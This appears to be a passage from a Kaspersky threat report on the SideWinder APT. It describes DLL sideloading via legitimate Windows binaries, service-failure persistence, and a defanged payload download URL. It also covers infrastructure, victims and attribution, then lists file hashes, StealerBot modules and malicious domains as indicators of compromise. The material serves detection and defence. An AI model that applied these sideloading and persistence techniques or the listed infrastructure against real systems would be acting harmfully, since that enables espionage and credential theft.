This is a legitimate Windows utility that provides the default GUI used by the Bluetooth File Transfer Wizard. This utility is used by the attacker to sideload another malicious library,
"devobj.dll", which is a variant of the Backdoor loader module.

InstallerPayload_NET

This is another .NET library, which performs similar actions to the previously described InstallerPayload developed in C++. The main difference is that this malware embeds most of the files as resources.

Similar to
InstallerPayload, the malware creates a new service that launches Manage.exe. Manage.exe is a simple program that sleeps for 20 seconds and then generates an exception.
The service is configured to launch another program in case of failure. The second program,
"fsquirt.exe" or "write.exe", is a legitimate application that is used to sideload a malicious library, the Backdoor loader module component.
The encrypted file to be loaded by the Backdoor loader module component is downloaded from a remote server using a URL embedded in the code:
hxxps://split.tyoin[.]biz/7n6at/g3mnr/1691394613799/f0f9e572
The received data are stored in a file with a random name and no extension.

Infrastructure

The attacker registered numerous domains using Hostinger, Namecheap, and Hosting Concepts as providers. They typically configure the malware to communicate with FQDN using specific subdomains with names that appear legitimate and are probably selected for relevance to the target. For example, the following is a small subset of subdomains used by the attacker.

Each domain and its related subdomains are resolved with a dedicated IP address. The C2s are hosted on a VPS used exclusively by the attacker, but rented from different providers for a very short time. The attacker uses different service providers, but has a preference for HZ Hosting, BlueVPS, and GhostNET.

Victims

SideWinder targeted entities in various countries: Bangladesh, Djibouti, Jordan, Malaysia, the Maldives, Myanmar, Nepal, Pakistan, Saudi Arabia, Sri Lanka, Turkey and the United Arab Emirates.

Targeted sectors include government and military entities, logistics, infrastructure and telecommunications companies, financial institutions, universities and oil trading companies. The attacker also targeted diplomatic entities in the following countries: Afghanistan, France, China, India, Indonesia and Morocco.

Attribution

We attribute these activities to the SideWinder APT group with medium/high confidence. The infection chain observed in these attacks is consistent with those observed in the past. Specifically, the following techniques are similar to previous SideWinder activity:

• The use of remote template injection, which is abused to download RTF files named “file.rtf” and forged to exploit CVE-2017-11882.
• The naming scheme used for the malicious subdomains, which attempts to resemble legitimate domains that are of significance to the targets.
• The .NET Downloader component and the Backdoor loader module are similar to those described in the past.
• Last but not least, most of the entities targeted by the group are similar to those targeted by SideWinder in the past.

***More information, IoCs and YARA rules for SideWinder are available to customers of the Kaspersky Intelligence Reporting Service. Contact: intelreports@kaspersky.com.

IOCs

Malicious documents

6cf6d55a3968e2176db2bba2134bbe94
c87eb71ff038df7b517644fa5c097eac
8202209354ece5c53648c52bdbd064f0
5cc784afb69c153ab325266e8a7afaf4
3a6916192106ae3ac7e55bd357bc5eee
54aadadcf77dec53b2566fe61b034384
8f83d19c2efc062e8983bce83062c9b6
8e8b61e5fb6f6792f2bee0ec947f1989
86eeb037f5669bff655de1e08199a554
1c36177ac4423129e301c5a40247f180
873079cd3e635adb609c38af71bad702
423e150d91edc568546f0d2f064a8bf1
4a5e818178f9b2dc48839a5dbe0e3cc1

Rtf

26aa30505d8358ebeb5ee15aecb1cbb0
3233db78e37302b47436b550a21cdaf9
8d7c43913eba26f96cd656966c1e26d5
d0d1fba6bb7be933889ace0d6955a1d7
e706fc65f433e54538a3dbb1c359d75f

Lnk

412b6ac53aeadb08449e41dccffb1abe දින සංශෝධන කර ගැනිම .lnk
2f4ba98dcd45e59fca488f436ab13501 Special Envoy Speech at NCA.jpg .lnk

Backdoor Loader

propsys.dll
b69867ee5b9581687cef96e873b775ff
c3ce4094b3411060928143f63701aa2e
e1bdfa55227d37a71cdc248dc9512296
ea4b3f023bac3ad1a982cace9a6eafc3
44dbdd87b60c20b22d2a7926ad2d7bea
7e97cbf25eef7fc79828c033049822af
vsstrace.dll
101a63ecdd8c68434c665bf2b1d3ffc7
d885df399fc9f6c80e2df0c290414c2f
92dd91a5e3dfb6260e13c8033b729e03
515d2d6f91ba4b76847301855dfc0e83
3ede84d84c02aa7483eb734776a20dea
2011658436a7b04935c06f59a5db7161

StealerBot

3a036a1846bfeceb615101b10c7c910e Orchestrator
47f51c7f31ab4a0d91a0f4c07b2f99d7 Keylogger
f3058ac120a2ae7807f36899e27784ea Screenshot grabber
0fbb71525d65f0196a9bfbffea285b18 File stealer
1ed7ad166567c46f71dc703e55d31c7a Live Console
2f0e150e3d6dbb1624c727d1a641e754 RDP Credential Stealer
bf16760ee49742225fdb2a73c1bd83c7 RDP Credential Stealer – Injected library
mscorlib.dll
b3650a88a50108873fc45ad3c249671a Token Grabber
4c40fcb2a12f171533fc070464db96d1 Credential Phisher – Injected library
eef9c0a9e364b4516a83a92592ffc831 UACBypass

SyncBotServiceHijack.dll

1be93704870afd0b22a4475014f199c3

Service Hijack

f840c721e533c05d152d2bc7bf1bc165 Manage.exe

Backdoor Loader devobj.dll

5718c0d69939284ce4f6e0ce580958df

Domains and IPs

126-com[.]live
163inc[.]com
afmat[.]tech
alit[.]live
aliyum[.]tech
aliyumm[.]tech
asyn[.]info
ausibedu[.]org
bol-south[.]org
cnsa-gov[.]org
colot[.]info
comptes[.]tech
condet[.]org
conft[.]live
dafpak[.]org
decoty[.]tech
defenec[.]net
defpak[.]org
detru[.]info
dgps-govpk[.]co
dgps-govpk[.]com
dinfed[.]co
dirctt88[.]co
dirctt88[.]net
direct888[.]net
direct88[.]co
directt888[.]com
donwload-file[.]com
donwloaded[.]com
donwloaded[.]net
dowmload[.]net
downld[.]net
download-file[.]net
downloadabledocx[.]com
dynat[.]tech
dytt88[.]org
e1ix[.]mov
e1x[.]tech
fia-gov[.]com
fia-gov[.]net
gov-govpk[.]info
govpk[.]info
govpk[.]net
grouit[.]tech
gtrec[.]info
healththebest[.]com
jmicc[.]xyz
kernet[.]info
kretic[.]info
lforvk[.]com
mfa-gov[.]info
mfa-gov[.]net
mfa-govt[.]net
mfacom[.]org
mfagov[.]org
mfas[.]pro
mitlec[.]site
mod-gov-pk[.]live
mofa[.]email
mofagovs[.]org
moittpk[.]net
moittpk[.]org
mshealthcheck[.]live
nactagovpk[.]org
navy-mil[.]co
newmofa[.]com
newoutlook[.]live
nopler[.]live
ntcpak[.]live
ntcpak[.]org
ntcpk[.]info
ntcpk[.]net
numpy[.]info
numzy[.]net
nventic[.]info
office-drive[.]live
pafgovt[.]com
paknavy-gov[.]org
paknavy-govpk[.]info
paknavy-govpk[.]net
pdfrdr-update[.]com
pdfrdr-update[.]info
pmd-office[.]com
pmd-office[.]live
pmd-office[.]org
ptcl-net[.]com
scrabt[.]tech
shipping-policy[.]info
sjfu-edu[.]co
support-update[.]info
tazze[.]co
tex-ideas[.]info
tni-mil[.]com
tsinghua-edu[.]tech
tumet[.]info
u1x[.]co
ujsen[.]net
update-govpk[.]co
updtesession[.]online
widge[.]info

securelist.com/sidewinder-apt/…